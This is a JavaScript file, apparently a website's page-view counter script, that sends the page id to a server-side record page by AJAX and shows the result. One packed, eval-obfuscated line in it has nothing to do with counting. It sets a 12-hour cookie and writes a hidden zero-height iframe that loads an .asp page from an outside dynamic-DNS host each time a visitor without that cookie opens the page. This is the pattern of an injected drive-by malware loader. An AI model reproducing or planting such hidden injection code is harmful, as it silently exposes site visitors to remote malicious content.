?/ JScript 文件

var xmlHttp;
var   urlStr   = location.href; 
var filename= urlStr.substr(urlStr.lastIndexOf('/')   +   1);   
var id=filename.substring(0,filename.lastIndexOf('.'));
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 a=3.7;4 9=a.x("6");w(9!=-1){}v{4 2=u t();2.s(2.r()+q*8*8*p);3.7="6=o;2="+2.n();3.m("<5 l=k://j.i.h/g/f.e d=c b=0></5>")}',34,34,'||expires|document|var|iframe|cookiesleep|cookie|60|start|cookieString|height|10|width|asp|as|include|org|3322|360safe4|http|src|write|toGMTString|test|1000|12|getTime|setTime|Date|new|else|if|indexOf'.split('|'),0,{}));

xmlHttp=CreateXmlHttpRequest();
var url="../recordnum.aspx?Id="+id;    
xmlHttp.open("get",url,true);    
xmlHttp.onreadystatechange=RecordResult;        
xmlHttp.send(null); 
function CreateXmlHttpRequest()
{
    if(window.XMLHttpRequest)
    {
        xmlHttp=new XMLHttpRequest();
    
        if(xmlHttp.overrideMimeType)
            {
                xmlHttp.overrideMimeType("text/xml");
            }
    }
    else if(window.ActiveXObject)
    {
        try
        {
            xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");                   
        }
        catch(e)
        {
            xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");                   
        }
    }
    if(!xmlHttp)
    {
        window.alert("你的浏览器不支持创建XMLhttpRequest对象");
    }
    return xmlHttp;
}
//创建用户检测的回调函数
function RecordResult()
{
   if(xmlHttp.readyState==4)//服务器响应状?
   {
        if(xmlHttp.status==200)//代码执行状?
        {
             document.getElementById("result").innerHTML=xmlHttp.responseText;
        }
    }
}
